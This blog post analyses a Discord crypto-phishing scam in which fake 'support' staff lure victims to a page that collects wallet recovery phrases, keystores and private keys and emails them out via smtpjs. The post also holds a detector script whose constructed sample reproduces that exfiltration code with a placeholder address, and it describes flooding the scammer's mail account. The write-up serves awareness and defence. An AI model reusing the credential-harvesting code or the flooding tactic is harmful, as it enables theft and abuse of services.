Analysis of a crypto scam

May 6, 2024 by Arnaud Stoz

Blockchain Ethereum

https://cylab.be/blog/340/analyse-of-a-crypto-scam

If you have ever joined a Discord server related to Ethereum (geth, ethereum.org), you have probably noticed that, despite the very useful information shared about the technology, those servers are unfortunately also full of scammers. Let's have a look at one of them and analyse the scam it proposes.

Scammer methodology

The methodology of these scammers is really simple and can be summarised as follows:

  1. They contact you by private message, pretending to be from the support team. [image: first_contact.png]
  2. If you show a little interest, they redirect you to a website where you are asked to "connect your wallet". In practice, the page asks you to enter everything there is to know about your wallet:
    • Your recovery phrase
    • Your keystore
    • Your private key (⚠️ never give your private key to anybody) [image: website.png]

Website analysis

Now that we know a bit more about the methodology used by these scammers, let's analyse the website itself. Looking at the page source, we notice that clicking the button calls the function sendEmail(). [image: page_source.png]

Let's have a look at the sendEmail function. [image: sendemail.png] It gives a lot of insight into how the website works:

  • First, it checks whether the input values match certain conditions. If not, it shows a pop-up kindly asking the victim to fill in all the data correctly.
  • Then it sends an email to a hardcoded recipient from a hardcoded sender address. It uses the smtpjs (v3) library to send the email.

We now have a good understanding of how the scam works: it tricks the victim into entering his wallet details, then sends them by email from a hardcoded sender address to a hardcoded recipient.

By replacing the recipient address with a temporary email address under our control, we can see exactly what the attacker receives. [image: email.png]
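The two signatures identified above (a form that asks for wallet secrets, and an smtpjs `Email.send` call with hardcoded `To`/`From` addresses) can be turned into a simple scanner for page sources. The following is an added example, not code from the original post or from the scam page; the sample HTML is constructed, the addresses and token are placeholders, and the `Email.send` object shape is the documented smtpjs v3 call.

```javascript
// Heuristic detector for wallet-phishing pages that exfiltrate secrets via smtpjs.
// Added example: not the scam page's code; sample input is constructed.

const SECRET_FIELD_RE = /(recovery|seed|mnemonic|secret)\s*phrase|keystore|private\s*key/i;
const SMTPJS_INCLUDE_RE = /smtpjs\.com\/v3\/smtp\.js/i;
const EMAIL_SEND_RE = /Email\.send\s*\(\s*\{([^}]*)\}/i;          // smtpjs v3 call shape
const HARDCODED_ADDR_RE = /\b(To|From)\s*:\s*["']([^"'@\s]+@[^"'\s]+)["']/gi;

function analysePage(html) {
  const findings = [];
  const asksSecrets = SECRET_FIELD_RE.test(html);
  if (SMTPJS_INCLUDE_RE.test(html)) findings.push('loads smtpjs (client-side mail sending)');
  if (asksSecrets) findings.push('form asks for wallet secrets (seed/keystore/private key)');
  const send = html.match(EMAIL_SEND_RE);
  const recipients = [];
  if (send) {
    // Pull the hardcoded To/From addresses out of the Email.send({...}) object literal.
    for (const m of send[1].matchAll(HARDCODED_ADDR_RE)) recipients.push(`${m[1]}=${m[2]}`);
    if (recipients.length) findings.push(`Email.send with hardcoded ${recipients.join(', ')}`);
  }
  // The scam signature is the combination: secrets requested AND mailed out client-side.
  const verdict = asksSecrets && send ? 'likely wallet-phishing kit' : 'no signature';
  return { verdict, findings, recipients };
}

// Constructed sample resembling the analysed page (placeholder addresses, no real domains).
const SAMPLE = `
<script src="https://smtpjs.com/v3/smtp.js"></script>
<form>
  <label>Recovery Phrase</label><input id="phrase">
  <label>Keystore JSON</label><textarea id="keystore"></textarea>
  <label>Private Key</label><input id="pk">
  <button onclick="sendEmail()">Connect wallet</button>
</form>
<script>
function sendEmail() {
  if (!phrase.value) { alert("Please fill in all fields"); return; }
  Email.send({ SecureToken: "TOKEN-PLACEHOLDER",
    To: "drop@example.invalid", From: "sender@example.invalid",
    Subject: "wallet", Body: phrase.value + keystore.value + pk.value });
}
</script>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(analysePage(SAMPLE));
}
```

The extracted `To`/`From` addresses are exactly what you would include when reporting the kit to the mail provider and the hosting service.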

⚠️ Disclaimer

Once a scammer has been identified, the best thing to do is to report them to all the services they use.

The next part is explained purely for educational purposes, to show how JavaScript can be manipulated to completely change the behaviour of a page.

⚠️ Do not reproduce this; simply report every scam to the appropriate service.

Manipulating Javascript

Now that we have all the information about the scam, let's have a deeper look at the smtpjs library. smtpjs relies on Elastic Email to work properly. Looking at Elastic Email, we can see it is a paid service used to send and manage marketing email campaigns. The account created by the scammer can therefore be used to send him a lot of emails containing fake credentials.

Simply by modifying the code of the sendEmail function, we can remove the check on the inputs and put the Email.send call in a for loop.

Once the code is modified, we click the button. After a number of emails have been sent, we receive the following message:

Service not available, closing transmission channel. The server response was: 026aac1d-071a-426f-b432-1e41d73ad719 Error: 421 Error: Not enough credit.

That means all the credit bought by the scammer to send emails has been exhausted: nobody else can be scammed using this specific website.

In the meantime, the scammer has been reported to the appropriate services, namely smtpjs and Discord.

Conclusion

As we have seen here, this scam is very basic:

  • It asks the user for credentials on a web page containing some basic JavaScript.
  • It then sends an email to the scammer containing the credentials entered on the web page.

When dealing with blockchain technology on Discord, please remember:

  • Do not trust any "support" person contacting you via DM.
  • Report any scam you identify.
  • Never, ever share your private key or recovery phrase with anybody.

This blog post is licensed under CC BY-SA 4.0
